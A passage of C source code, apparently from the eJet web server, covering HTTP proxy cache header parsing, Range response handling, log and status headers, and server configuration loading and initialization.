        /* if the requested file is in the local cache and the cache file already holds
           all of the data, or the requested Ranges are found in the local cache, mark
           the response as servable from the local cache file */
if (incache || frag_pack_complete(cacinfo->frag)) {
msg->res_file_cache = 4;
}
}
return msg->res_file_cache;
}
static char * str2int64 (char * pbgn, int len, int64 * pval)
{
int64 val = 0;
int i;
for (i = 0; i < len && isdigit(pbgn[i]); i++) {
val *= 10; val += pbgn[i] - '0';
}
if (pval) *pval = val;
return pbgn + i;
}
int http_proxy_cache_parse (void * vmsg, void * vclimsg, int * resend)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMsg * climsg = (HTTPMsg *)vclimsg;
CacheInfo * cacinfo = NULL;
HeaderUnit * punit = NULL;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
int len = 0;
uint8 directive = 0; //0-max-age 1-no cache 2-no store
uint8 revalidate = 0; //0-none 1-must-revalidate
    uint8 pubattr = 0; //0-unknown 1-public 2-private(only browser cache)
time_t expire = 0;
int maxage = 0;
time_t mtime = 0;
char etag[36] = {0};
uint8 hasrange = 0;
int64 start = 0;
int64 end = 0;
int64 size = 0;
char * plist[8];
int plen[8];
int i, num;
if (resend) *resend = 0;
if (!msg) return -1;
if (!climsg) return -1;
if (!msg->cacheon) return -100;
if (climsg->issued) return 0;
if (msg->res_status >= 300 || msg->res_status < 200) {
msg->cacheon = 0;
climsg->cacheon = 0;
return -200;
}
punit = http_header_get(msg, 1, "Expires", -1);
if (punit && punit->valuelen > 0) {
str_gmt2time(HUValue(punit), punit->valuelen, &expire);
}
punit = http_header_get(msg, 1, "Last-Modified", -1);
if (punit && punit->valuelen > 0) {
str_gmt2time(HUValue(punit), punit->valuelen, &mtime);
}
memset(etag, 0, sizeof(etag));
punit = http_header_get(msg, 1, "ETag", -1);
if (punit && punit->valuelen > 0) {
pbgn = HUValue(punit);
pend = pbgn + punit->valuelen;
poct = skipTo(pbgn, pend-pbgn, "\"", 1);
if (poct >= pend) {
len = pend - pbgn;
} else {
pbgn = poct + 1;
poct = skipTo(pbgn, pend-pbgn, "\"", 1);
len = poct - pbgn;
}
str_secpy(etag, sizeof(etag)-1, pbgn, len);
}
punit = http_header_get(msg, 1, "Cache-Control", -1);
if (punit && punit->valuelen > 0) {
num = string_tokenize(HUValue(punit), punit->valuelen, ",", 1, (void **)plist, plen, 8);
for (i = 0; i < num; i++) {
pbgn = plist[i];
pend = pbgn + plen[i];
pbgn = skipOver(pbgn, pend-pbgn, ", \t", 3);
poct = rskipOver(pend-1, pend-pbgn, ", \t", 3);
if (poct < pbgn) continue;
pend = poct + 1;
len = pend - pbgn;
if (len >= 8 && strncasecmp(pbgn, "no-cache", 8) == 0) {
directive = 1; //no cache
} else if (len >= 8 && strncasecmp(pbgn, "no-store", 8) == 0) {
directive = 2; //no store
} else if (len >= 7 && strncasecmp(pbgn, "max-age", 7) == 0) {
directive = 0; //max-age
pbgn = skipTo(pbgn + 7, pend-pbgn-7, "=", 1);
if (pbgn > pend) {
maxage = 0;
} else {
pbgn = skipOver(pbgn, pend-pbgn, "= \t", 3);
if (isdigit(*pbgn))
maxage = str_to_int(pbgn, pend-pbgn, 10, NULL);
else
maxage = 0;
}
} else if (len >= 15 && strncasecmp(pbgn, "must-revalidate", 15) == 0) {
revalidate = 1; //must-revalidate
} else if (len >= 6 && strncasecmp(pbgn, "public", 6) == 0) {
pubattr = 1; //public
} else if (len >= 7 && strncasecmp(pbgn, "private", 7) == 0) {
pubattr = 2; //private
}
}
}
if (directive > 0 || /* no-cache or no-store */
(directive == 0 && maxage == 0) || /* max-age set but value is 0 */
revalidate) /* set must-revalidate directive */
{
climsg->cacheon = 0;
msg->cacheon = 0;
if (climsg->res_cache_info) {
cache_info_close(climsg->res_cache_info);
climsg->res_cache_info = NULL;
}
        /* now check whether the proxy response body covers the originally requested Range */
if (climsg->cache_req_start != climsg->cache_req_off) {
if (resend) *resend = 1;
}
}
if (!msg->cacheon) return 0;
punit = http_header_get(msg, 1, "Content-Range", -1);
if (punit && punit->valuelen >= 5) { //Content-Range: bytes 1000-5000/29387
pbgn = HUValue(punit);
pend = pbgn + punit->valuelen;
if (strncasecmp(pbgn, "bytes", 5) == 0) {
pbgn = skipOver(pbgn+5, pend-pbgn-5, " \t\r\n\f\v", 6);
num = string_tokenize(pbgn, pend-pbgn, "-/ \t", 4, (void **)plist, plen, 8);
if (num > 0) str2int64(plist[0], plen[0], &start);
if (num > 1) str2int64(plist[1], plen[1], &end);
if (num > 2) str2int64(plist[2], plen[2], &size);
hasrange = 1;
}
}
if ((cacinfo = climsg->res_cache_info) == NULL) {
cacinfo = cache_info_create (msg->httpmgmt,
climsg->res_file_name,
msg->res_body_length);
if (!cacinfo) {
msg->cacheon = climsg->cacheon = 0;
return -200;
}
climsg->res_cache_info = cacinfo;
}
EnterCriticalSection(&cacinfo->cacheCS);
cacinfo->directive = directive;
cacinfo->revalidate = revalidate;
cacinfo->pubattr = pubattr;
if (cacinfo->ctime == 0)
cacinfo->ctime = time(NULL);
cacinfo->expire = expire;
cacinfo->maxage = maxage;
cacinfo->mtime = mtime;
if (cacinfo->mtime == 0)
cacinfo->mtime = time(NULL);
str_secpy(cacinfo->etag, sizeof(cacinfo->etag), etag, strlen(etag));
msg->GetResContentTypeID(msg, &cacinfo->mimeid, NULL);
cacinfo->body_flag = msg->res_body_flag;
cacinfo->header_length = msg->res_header_length;
if (msg->res_body_length > 0 &&
climsg->cache_req_off == 0 &&
climsg->cache_req_len < 0)
cacinfo->body_length = msg->res_body_length;
climsg->res_file_handle = native_file_open(cacinfo->cache_tmp, NF_READ | NF_WRITE);
if (hasrange) {
num = native_file_seek(climsg->res_file_handle, start);
if (size > 0) {
if (cacinfo->body_length != size)
cacinfo->body_length = size;
if (frag_pack_length(cacinfo->frag) != size)
frag_pack_set_length(cacinfo->frag, size);
}
} else {
num = native_file_seek(climsg->res_file_handle, climsg->cache_req_start);
}
cache_info_write_meta(cacinfo);
LeaveCriticalSection(&cacinfo->cacheCS);
return 1;
}
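/* Example of the header parsing above (illustrative): a response carrying
 *     Cache-Control: max-age=3600, public
 *     Content-Range: bytes 1000-4999/29387
 * yields directive=0, maxage=3600, pubattr=1 and hasrange=1 with start=1000,
 * end=4999, size=29387, and those values are then recorded in the CacheInfo
 * meta data. A response carrying "no-cache", "no-store" or "must-revalidate"
 * instead disables caching for this message. */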
int http_proxy_cache_complete (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
CacheInfo * cacinfo = NULL;
if (!msg) return -1;
if (!msg->cacheon) return -100;
cacinfo = (CacheInfo *)msg->res_cache_info;
if (!cacinfo) return -101;
if (frag_pack_complete(cacinfo->frag)) {
        /* the cache file has gotten all bytes, now rename it to the final file name */
if (strcmp(cacinfo->cache_file, msg->res_file_name) != 0)
rename(cacinfo->cache_file, msg->res_file_name);
}
return 0;
}
int http_cache_response_header (void * vmsg, void * vcacinfo)
{
HTTPMsg * climsg = (HTTPMsg *)vmsg;
CacheInfo * cacinfo = (CacheInfo *)vcacinfo;
http_partial_t * part = NULL;
int64 start = 0;
int64 end = 0;
int64 length = 0;
char buf[128];
if (!climsg) return -1;
if (!cacinfo) cacinfo = (CacheInfo *)climsg->res_cache_info;
if (!cacinfo) return -3;
http_header_del(climsg, 1, "ETag", 4);
http_header_del(climsg, 1, "Content-Length", 14);
http_header_del(climsg, 1, "Content-Range", 13);
http_header_del(climsg, 1, "Transfer-Encoding", 17);
if (cacinfo->body_length > 0) {
climsg->res_body_flag = BC_CONTENT_LENGTH;
if (climsg->partial_flag > 0) {
part = vstar_get(climsg->partial_list, 0);
switch (part->partflag) {
case 1:
start = part->start >= cacinfo->body_length ? cacinfo->body_length : part->start;
end = part->end >= cacinfo->body_length ? cacinfo->body_length - 1 : part->end;
length = end - start + 1;
break;
case 2:
start = part->start >= cacinfo->body_length ? cacinfo->body_length : part->start;
length = cacinfo->body_length - start;
end = start + length - 1;
break;
case 3:
length = part->length > cacinfo->body_length ? cacinfo->body_length : part->length;
start = cacinfo->body_length - length;
end = cacinfo->body_length - 1;
}
climsg->res_body_length = length;
http_header_append_int64(climsg, 1, "Content-Length", 14, length);
#if defined(_WIN32) || defined(_WIN64)
sprintf(buf, "bytes %I64d-%I64d/%I64d", start, end, cacinfo->body_length);
#else
sprintf(buf, "bytes %lld-%lld/%lld", start, end, cacinfo->body_length);
#endif
http_header_append(climsg, 1, "Content-Range", 13, buf, strlen(buf));
if (length < cacinfo->body_length) {
if (climsg->res_status >= 200 && climsg->res_status < 300)
climsg->SetStatus(climsg, 206, NULL);
} else {
if (climsg->res_status > 200 && climsg->res_status < 300)
climsg->SetStatus(climsg, 200, NULL);
}
} else {
http_header_append_int64(climsg, 1, "Content-Length", 14, cacinfo->body_length);
climsg->res_body_length = cacinfo->body_length;
if (climsg->res_status > 200 && climsg->res_status < 300)
climsg->SetStatus(climsg, 200, NULL);
}
} else {
climsg->res_body_flag = BC_TE;
http_header_append(climsg, 1, "Transfer-Encoding", 17, "chunked", 7);
}
if (cacinfo->expire > 0 && http_header_get(climsg, 1, "Expires", 7) == NULL) {
str_time2gmt(&cacinfo->expire, buf, sizeof(buf)-1, 0);
http_header_append(climsg, 1, "Expires", 7, buf, strlen(buf));
}
if (cacinfo->maxage > 0 && http_header_get(climsg, 1, "Cache-Control", 13) == NULL) {
sprintf(buf, "max-age=%d", cacinfo->maxage);
if (cacinfo->pubattr == 1) {
sprintf(buf + strlen(buf), ", public");
} else if (cacinfo->pubattr == 2) {
sprintf(buf + strlen(buf), ", private");
}
http_header_append(climsg, 1, "Cache-Control", 13, buf, strlen(buf));
}
return 0;
}
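/* Example of the Range handling above (illustrative): for a cached body of 29387
 * bytes and a client part with partflag=1, start=1000, end=4999, the function emits
 * "Content-Length: 4000" and "Content-Range: bytes 1000-4999/29387" and switches a
 * 2xx status to 206, since the served length is smaller than the full body length. */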
<|start_filename|>include/http_log.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_LOG_H_
#define _HTTP_LOG_H_
#ifdef __cplusplus
extern "C" {
#endif
typedef struct http_log_ {
/* log config info */
uint8 enable; /* get from conf */
char * logfile; /* get from conf */
CRITICAL_SECTION logCS;
    /* allocated space for the log content of an HTTPMsg */
frame_p format;
char * logcont;
int loglen;
FILE * fp;
void * mgmt;
} HTTPLog, http_log_t;
void * http_log_init (void * vmgmt);
int http_log_clean (void * vlog);
int http_log_write (void * vmsg);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_status.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_STATUS_H_
#define _HTTP_STATUS_H_
#ifdef __cplusplus
extern "C" {
#endif
int http_status_init (void * vmgmt);
int http_status_cleanup (void * vmgmt);
int http_get_status (void * vmgmt, char * status, int statuslen, char ** preason);
int http_get_status2 (void * vmgmt, int status, char ** preason);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>src/http_mgmt.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "epump.h"
#include "http_header.h"
#include "http_msg.h"
#include "http_mgmt.h"
#include "http_srv.h"
#include "http_con.h"
#include "http_listen.h"
#include "http_status.h"
#include "http_sndpxy.h"
#include "http_pump.h"
#include "http_request.h"
#include "http_response.h"
#include "http_handle.h"
#include "http_cookie.h"
#include "http_ssl.h"
#include "http_variable.h"
#include "http_fcgi_srv.h"
#include "http_log.h"
#include "http_cache.h"
#include "http_script.h"
char * g_http_version = "1.2.6";
char * g_http_build = "eJet/1.2.6 Web Server built "__DATE__" "__TIME__" "
"by <EMAIL>";
char * g_http_author = "<NAME> <<EMAIL>>";
HTTPMgmt * gp_httpmgmt = NULL;
int http_mgmt_get_conf (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
char key[256];
int keylen = 0;
int ret = 0;
char * pstr = NULL;
if (!mgmt) return -1;
mgmt->conn_check_interval = 3;
mgmt->srv_check_interval = 5;
    /* configuration for receiving client requests */
sprintf(key, "http.url not escape char"); keylen = strlen(key);
ret = json_mgetP(mgmt->cnfjson, key, keylen, (void **)&mgmt->uri_unescape_char, NULL);
if (ret <= 0)
mgmt->uri_unescape_char = "-_.~!*'();:@&=+$,/?#][";
sprintf(key, "http.cookie file"); keylen = strlen(key);
ret = json_mgetP(mgmt->cnfjson, key, keylen, (void **)&mgmt->cookie_file, NULL);
if (ret <= 0)
mgmt->cookie_file = "./cookie.txt";
sprintf(key, "http.receive request.max header size"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->cli_max_header_size);
if (ret <= 0)
mgmt->cli_max_header_size = 32*1024;
sprintf(key, "http.receive request.body cache"); keylen = strlen(key);
ret = json_mgetP(mgmt->cnfjson, key, keylen, (void **)&pstr, NULL);
if (ret <= 0 || !pstr) mgmt->cli_body_cache = 0;
if (pstr && strcasecmp(pstr, "on") == 0)
mgmt->cli_body_cache = 1;
else
mgmt->cli_body_cache = 0;
sprintf(key, "http.receive request.body cache threshold"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->cli_body_cache_threshold);
if (ret <= 0)
mgmt->cli_body_cache_threshold = 64*1024;
sprintf(key, "http.receive request.keepalive timeout"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->cli_keepalive_time);
if (ret <= 0)
mgmt->cli_keepalive_time = 30;
sprintf(key, "http.receive request.connection idle timeout"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->cli_conn_idle_time);
if (ret <= 0)
mgmt->cli_conn_idle_time = 10;
sprintf(key, "http.receive request.header idle timeout"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->cli_header_idletime);
if (ret <= 0)
mgmt->cli_header_idletime = 10;
sprintf(key, "http.receive request.header timeout"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->cli_header_time);
if (ret <= 0)
mgmt->cli_header_time = 30;
sprintf(key, "http.receive request.request handle timeout"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->cli_request_handle_time);
if (ret <= 0)
mgmt->cli_request_handle_time = 180;
    /* configuration for sending requests to the remote origin server */
sprintf(key, "http.send request.max header size"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->srv_max_header_size);
if (ret <= 0)
mgmt->srv_max_header_size = 32*1024;
sprintf(key, "http.send request.connecting timeout"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->srv_connecting_time);
if (ret <= 0)
mgmt->srv_connecting_time = 8;
sprintf(key, "http.send request.keepalive timeout"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->srv_keepalive_time);
if (ret <= 0)
mgmt->srv_keepalive_time = 10;
sprintf(key, "http.send request.connection idle timeout"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->srv_conn_idle_time);
if (ret <= 0)
mgmt->srv_conn_idle_time = 180;
    /* When sending a request to the origin server over an HTTPS/SSL connection, the current
       web server acts as an SSL client. If the SSL peer requires strict client authentication,
       the certificate, private key and CA verification chain certificates must be provided. */
sprintf(key, "http.send request.ssl certificate"); keylen = strlen(key);
ret = json_mgetP(mgmt->cnfjson, key, keylen, (void **)&mgmt->srv_con_cert, NULL);
if (ret <= 0)
mgmt->srv_con_cert = NULL;
sprintf(key, "http.send request.ssl private key"); keylen = strlen(key);
ret = json_mgetP(mgmt->cnfjson, key, keylen, (void **)&mgmt->srv_con_prikey, NULL);
if (ret <= 0)
mgmt->srv_con_prikey = NULL;
sprintf(key, "http.send request.ssl ca certificate"); keylen = strlen(key);
ret = json_mgetP(mgmt->cnfjson, key, keylen, (void **)&mgmt->srv_con_cacert, NULL);
if (ret <= 0)
mgmt->srv_con_cacert = NULL;
sprintf(key, "http.send request.root"); keylen = strlen(key);
ret = json_mgetP(mgmt->cnfjson, key, keylen, (void **)&mgmt->srv_resp_root, NULL);
if (ret <= 0)
mgmt->srv_resp_root = NULL;
sprintf(key, "http.send request.cache"); keylen = strlen(key);
ret = json_mgetP(mgmt->cnfjson, key, keylen, (void **)&pstr, NULL);
if (ret <= 0 || !pstr) mgmt->srv_resp_cache = 0;
if (pstr && strcasecmp(pstr, "on") == 0)
mgmt->srv_resp_cache = 1;
else
mgmt->srv_resp_cache = 0;
sprintf(key, "http.send request.cache file"); keylen = strlen(key);
ret = json_mgetP(mgmt->cnfjson, key, keylen, (void **)&mgmt->srv_resp_cache_file, NULL);
if (ret <= 0)
mgmt->srv_resp_cache_file = NULL;
/* proxy configuration */
sprintf(key, "http.proxy.connect tunnel"); keylen = strlen(key);
ret = json_mgetP(mgmt->cnfjson, key, keylen, (void **)&pstr, NULL);
if (ret <= 0 || !pstr) mgmt->proxy_tunnel = 0;
if (pstr && strcasecmp(pstr, "on") == 0)
mgmt->proxy_tunnel = 1;
else
mgmt->proxy_tunnel = 0;
sprintf(key, "http.proxy.tunnel keepalive timeout"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->tunnel_keepalive_time);
if (ret <= 0)
mgmt->tunnel_keepalive_time = 60;
sprintf(key, "http.proxy.auto redirect"); keylen = strlen(key);
ret = json_mgetP(mgmt->cnfjson, key, keylen, (void **)&pstr, NULL);
if (ret <= 0 || !pstr) mgmt->auto_redirect = 0;
if (pstr && strcasecmp(pstr, "on") == 0)
mgmt->auto_redirect = 1;
else
mgmt->auto_redirect = 0;
sprintf(key, "http.proxy.buffer size"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->proxy_buffer_size);
if (ret <= 0)
mgmt->proxy_buffer_size = 256*1024;
/* FastCGI interface parameters, maintaining TCP/UnixSock connection to FCGI server */
sprintf(key, "http.fastcgi.connecting timeout"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->fcgi_connecting_time);
if (ret <= 0)
mgmt->fcgi_connecting_time = 10;
sprintf(key, "http.fastcgi.keepalive timeout"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->fcgi_keepalive_time);
if (ret <= 0)
mgmt->fcgi_keepalive_time = 30;
sprintf(key, "http.fastcgi.connection idle timeout"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->fcgi_conn_idle_time);
if (ret <= 0)
mgmt->fcgi_conn_idle_time = 90;
sprintf(key, "http.fastcgi.fcgi server alive timeout"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->fcgi_srv_alive_time);
if (ret <= 0)
mgmt->fcgi_srv_alive_time = 120;
sprintf(key, "http.fastcgi.buffer size"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->fcgi_buffer_size);
if (ret <= 0)
mgmt->fcgi_buffer_size = 256*1024;
return 0;
}
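/* Sketch of the JSON configuration read above (illustrative; the values shown are
 * hypothetical and the in-code defaults apply when a key is absent). This assumes the
 * dotted keys such as "http.receive request.max header size" map onto nested objects:
 *
 *     "http": {
 *         "cookie file": "./cookie.txt",
 *         "receive request": { "max header size": 32768, "keepalive timeout": 30 },
 *         "send request":    { "connecting timeout": 8, "cache": "on",
 *                              "cache file": "cache/resp.dat" },
 *         "proxy":           { "connect tunnel": "on", "buffer size": 262144 },
 *         "fastcgi":         { "connecting timeout": 10, "buffer size": 262144 }
 *     }
 */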
void * http_mgmt_alloc (void * pcore, char * confname, int extsize, int msgextsize)
{
HTTPMgmt * mgmt = NULL;
if (extsize < 1) extsize = 1;
if (msgextsize < 1) msgextsize = 1;
mgmt = (HTTPMgmt *)kzalloc(sizeof(*mgmt) - 1 + extsize);
if (!mgmt) return NULL;
tolog(0, "\n");
tolog(1, "eJet - HTTP module allocated.\n");
strcpy(mgmt->httpver0, "HTTP/1.0");
strcpy(mgmt->httpver1, "HTTP/1.1");
mgmt->header_num = 71;
sprintf(mgmt->useragent, "eJet/%s", g_http_version);
mgmt->addrnum = get_selfaddr(6, mgmt->localaddr);
mgmt->cnfjson = json_init(1, 1, 1);
if (confname) {
json_decode_file(mgmt->cnfjson, confname, strlen(confname), 0, 0);
}
http_mgmt_get_conf(mgmt);
tolog(1, "eJet - Json Conf '%s' read.\n", confname);
file_abspath(confname, mgmt->root_path, sizeof(mgmt->root_path)-1);
#ifdef UNIX
chdir(mgmt->root_path);
#elif defined(_WIN32) || defined(_WIN64)
SetCurrentDirectory(mgmt->root_path);
#endif
tolog(1, "eJet - Working Path '%s' set\n", mgmt->root_path);
mgmt->mimemgmt_alloc = 0;
GetRandStr(mgmt->uploadso, 18, 0);
GetRandStr(mgmt->shellcmdso, 20, 0);
GetRandStr(mgmt->uploadvar, 10, 0);
GetRandStr(mgmt->shellcmdvar, 8, 0);
strcat((char *)mgmt->uploadso, ".so");
strcat((char *)mgmt->shellcmdso, ".so");
mgmt->msgextsize = msgextsize;
mgmt->pcore = pcore;
gp_httpmgmt = mgmt;
return mgmt;
}
int http_mgmt_init (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
#ifdef HAVE_OPENSSL
http_ssl_library_init();
#endif
http_uri_escape_init(mgmt);
http_send_proxy_init(mgmt);
if (mgmt->msgextsize <= 0) mgmt->msgextsize = 1;
mgmt->httplog = http_log_init(mgmt);
mgmt->conid = 1;
InitializeCriticalSection(&mgmt->conCS);
mgmt->con_table = ht_only_new(800, http_con_cmp_conid);
ht_set_hash_func(mgmt->con_table, http_con_hash_func);
mgmt->msgid = 0;
InitializeCriticalSection(&mgmt->msgidCS);
InitializeCriticalSection(&mgmt->msgtableCS);
mgmt->msg_table = ht_only_new(600, http_msg_cmp_msgid);
ht_set_hash_func(mgmt->msg_table, http_msg_hash_msgid);
if (!mgmt->con_pool) {
mgmt->con_pool = bpool_init(NULL);
bpool_set_initfunc (mgmt->con_pool, http_con_init);
bpool_set_freefunc (mgmt->con_pool, http_con_free);
bpool_set_unitsize(mgmt->con_pool, sizeof(HTTPCon));
bpool_set_allocnum(mgmt->con_pool, 64);
}
if (!mgmt->msg_pool) {
mgmt->msg_pool = bpool_init(NULL);
bpool_set_freefunc(mgmt->msg_pool, http_msg_free);
bpool_set_unitsize(mgmt->msg_pool, sizeof(HTTPMsg) - 1 + mgmt->msgextsize);
bpool_set_allocnum(mgmt->msg_pool, 128);
}
if (!mgmt->header_unit_pool) {
mgmt->header_unit_pool = bpool_init(NULL);
bpool_set_freefunc(mgmt->header_unit_pool, hunit_free);
bpool_set_unitsize(mgmt->header_unit_pool, sizeof(HeaderUnit));
bpool_set_allocnum(mgmt->header_unit_pool, 256);
}
if (!mgmt->frame_pool) {
mgmt->frame_pool = bpool_init(NULL);
bpool_set_initfunc(mgmt->frame_pool, frame_empty);
bpool_set_freefunc(mgmt->frame_pool, frame_free);
bpool_set_unitsize(mgmt->frame_pool, sizeof(frame_t));
bpool_set_allocnum(mgmt->frame_pool, 64);
//bpool_set_getsizefunc(mgmt->frame_pool, frame_size);
//bpool_set_freesize(mgmt->frame_pool, 32*1024);
}
if (!mgmt->mimemgmt) {
mgmt->mimemgmt = mime_type_init();
mgmt->mimemgmt_alloc = 1;
}
http_conf_mime_init(mgmt);
http_cache_info_init(mgmt);
http_var_init(mgmt);
http_status_init(mgmt);
http_mgmt_srv_init(mgmt);
if (mgmt->srv_sslctx == NULL) {
#ifdef HAVE_OPENSSL
mgmt->srv_sslctx = http_ssl_client_ctx_init(mgmt->srv_con_cert,
mgmt->srv_con_prikey, mgmt->srv_con_cacert);
#endif
}
InitializeCriticalSection(&mgmt->countCS);
gettimeofday(&mgmt->count_tick, NULL);
mgmt->total_recv = 0;
mgmt->total_sent = 0;
if (mgmt->objinit)
(*mgmt->objinit)(mgmt, &mgmt->extdata[0], mgmt->hobjconf);
http_mgmt_fcgisrv_init(mgmt);
mgmt->cookiemgmt = cookie_mgmt_alloc(mgmt, mgmt->cookie_file);
script_parser_init();
http_listen_init(mgmt);
tolog(0, "\n");
return 0;
}
int http_mgmt_cleanup (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return -1;
tolog(0, "\n");
script_parser_clean();
http_var_free(mgmt);
if (mgmt->srv_sslctx) {
#ifdef HAVE_OPENSSL
http_ssl_ctx_free(mgmt->srv_sslctx);
#endif
mgmt->srv_sslctx = NULL;
}
http_listen_cleanup(mgmt);
if (mgmt->mimemgmt && mgmt->mimemgmt_alloc) {
mime_type_clean(mgmt->mimemgmt);
mgmt->mimemgmt = NULL;
mgmt->mimemgmt_alloc = 0;
}
http_conf_mime_clean(mgmt);
DeleteCriticalSection(&mgmt->conCS);
if (mgmt->con_table) {
ht_free_all(mgmt->con_table, http_con_free);
mgmt->con_table = NULL;
}
cookie_mgmt_free(mgmt->cookiemgmt);
http_mgmt_srv_clean(mgmt);
http_status_cleanup(mgmt);
http_send_proxy_clean(mgmt);
DeleteCriticalSection(&mgmt->msgidCS);
DeleteCriticalSection(&mgmt->msgtableCS);
ht_free_all(mgmt->msg_table, http_msg_free);
http_mgmt_fcgisrv_clean(mgmt);
if (mgmt->con_pool) {
bpool_clean(mgmt->con_pool);
mgmt->con_pool = NULL;
}
if (mgmt->msg_pool) {
bpool_clean(mgmt->msg_pool);
mgmt->msg_pool = NULL;
}
if (mgmt->header_unit_pool) {
bpool_clean(mgmt->header_unit_pool);
mgmt->header_unit_pool = NULL;
}
if (mgmt->frame_pool) {
bpool_clean(mgmt->frame_pool);
mgmt->frame_pool = NULL;
}
/* application-layer resource release now */
if (mgmt->objclean)
(*mgmt->objclean)(&mgmt->extdata[0]);
if (mgmt->httplog) {
http_log_clean(mgmt->httplog);
mgmt->httplog = NULL;
}
http_cache_info_clean(mgmt);
mgmt->pcore = NULL;
if (mgmt->cnfjson) {
json_clean(mgmt->cnfjson);
mgmt->cnfjson = NULL;
}
DeleteCriticalSection(&mgmt->countCS);
gp_httpmgmt = NULL;
kfree(mgmt);
tolog(1, "eJet - HTTP module exited.\n");
tolog(0, "\n");
return 0;
}
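/* Lifecycle sketch (illustrative, not part of the original source): a typical embedding
 * allocates the management object from a JSON config file, initializes it, runs the
 * event loop owned by pcore, and cleans up on shutdown. "ejet.conf" and pcore are
 * placeholders supplied by the caller.
 *
 *     void * mgmt = http_mgmt_alloc(pcore, "ejet.conf", 0, 0);
 *     http_mgmt_init(mgmt);
 *     ... run the epump event loop ...
 *     http_mgmt_cleanup(mgmt);
 */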
int http_mgmt_obj_init (void * vmgmt, HTTPObjInit * objinit, void * hconf)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return -1;
mgmt->objinit = objinit;
mgmt->hobjconf = hconf;
return 0;
}
int http_mgmt_obj_clean (void * vmgmt, HTTPObjClean * objclean)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return -1;
mgmt->objclean = objclean;
return 0;
}
void * http_mgmt_obj (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return NULL;
return &mgmt->extdata[0];
}
void http_uri_escape_init (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
int i, len;
if (!mgmt) return;
for (i = 0; i < 8; i++) {
mgmt->uri_bitmask[i] = 0xFFFFFFFF;
}
for (i = 0; i < 26; i++) {
bit_mask_unset(mgmt->uri_bitmask, 'a' + i);
}
for (i = 0; i < 26; i++) {
bit_mask_unset(mgmt->uri_bitmask, 'A' + i);
}
for (i = 0; i < 10; i++) {
bit_mask_unset(mgmt->uri_bitmask, '0' + i);
}
len = str_len(mgmt->uri_unescape_char);
    for (i = 0; i < len; i++) {
bit_mask_unset(mgmt->uri_bitmask, mgmt->uri_unescape_char[i]);
}
tolog(1, "eJet - Bit-Mask for URI-escape/unescape set.\n");
return;
}
void http_overhead (void * vmgmt, uint64 * recv, uint64 * sent,
struct timeval * lasttick, int reset, struct timeval * curt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return;
EnterCriticalSection(&mgmt->countCS);
if (recv) *recv = mgmt->total_recv;
if (sent) *sent = mgmt->total_sent;
if (lasttick) *lasttick = mgmt->count_tick;
if (reset) {
if (curt) mgmt->count_tick = *curt;
else gettimeofday(&mgmt->count_tick, NULL);
mgmt->total_recv = 0;
mgmt->total_sent = 0;
}
LeaveCriticalSection(&mgmt->countCS);
}
void http_overhead_sent (void * vmgmt, long sent)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return;
EnterCriticalSection(&mgmt->countCS);
mgmt->total_sent += sent;
LeaveCriticalSection(&mgmt->countCS);
}
void http_overhead_recv (void * vmgmt, long recv)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return;
EnterCriticalSection(&mgmt->countCS);
mgmt->total_recv += recv;
LeaveCriticalSection(&mgmt->countCS);
}
int http_set_reqhandler (void * vmgmt, HTTPCBHandler * reqhandler, void * cbobj)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return -1;
mgmt->req_handler = reqhandler;
mgmt->req_cbobj = cbobj;
return 0;
}
int http_set_reqcheck(void * vmgmt, HTTPCBHandler * reqcheck, void * checkobj)
{
